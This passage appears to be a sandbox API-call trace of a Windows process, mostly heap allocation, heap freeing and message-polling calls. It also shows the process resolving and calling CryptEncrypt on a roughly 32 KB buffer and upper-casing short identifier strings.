out: hHeap=0x25c0000) returned 1 [0258.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0258.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0258.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0258.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0258.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0258.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0258.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0258.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa910, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0258.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0258.443] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0258.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0258.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0258.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0258.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0258.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0258.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0258.443] CryptEncrypt (in: hKey=0xaa5820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x7f8f, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x7f90) returned 1 [0258.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0258.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0258.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0258.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0258.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0258.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0258.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0258.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0258.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0258.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0258.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0258.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0258.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0258.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0258.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0258.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0258.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0258.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0258.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0258.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0258.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0258.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0258.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0258.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0258.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0258.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0258.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0258.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0258.445] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0258.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0258.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0258.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0258.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0258.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0258.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0258.446] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.446] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0258.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0258.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0258.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0258.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0258.446] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0258.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0258.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0258.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0258.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0258.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0258.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0258.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0258.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0258.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0258.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0258.447] CharLowerBuffW (in: lpsz="byte[32656]", cchLength=0xb | out: lpsz="byte[32656]") returned 0xb [0258.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0258.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0258.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0258.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0258.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0258.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0258.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0258.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0258.447] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0258.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0258.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0258.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0258.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0258.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0258.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0258.448] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0258.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0258.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0258.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0258.448] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.448] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0258.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0258.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0258.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0258.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0258.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0258.448] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.449] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.449] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0258.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0258.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0258.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0258.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0258.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0258.449] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0258.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0258.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.449] CryptEncrypt (in: hKey=0xaa5820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24c7978*, pdwDataLen=0x8bef68*=0x7f8f, dwBufLen=0x7f90 | out: pbData=0x24c7978*, pdwDataLen=0x8bef68*=0x7f90) returned 1 [0258.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0258.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0258.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0258.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0258.450] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0258.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0258.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0258.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0258.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0258.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0258.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0258.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0258.451] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.451] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0258.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0258.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0258.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0258.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0258.451] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0258.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0258.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0258.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0258.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0258.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0258.451] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0258.451] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0258.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0258.452] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0258.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0258.452] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0258.452] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0258.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0258.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0258.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0258.452] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0258.452] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.452] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0258.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0258.452] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0258.452] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0258.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0258.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0258.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0258.453] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0258.453] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.453] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0258.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0258.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0258.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0258.453] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.453] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 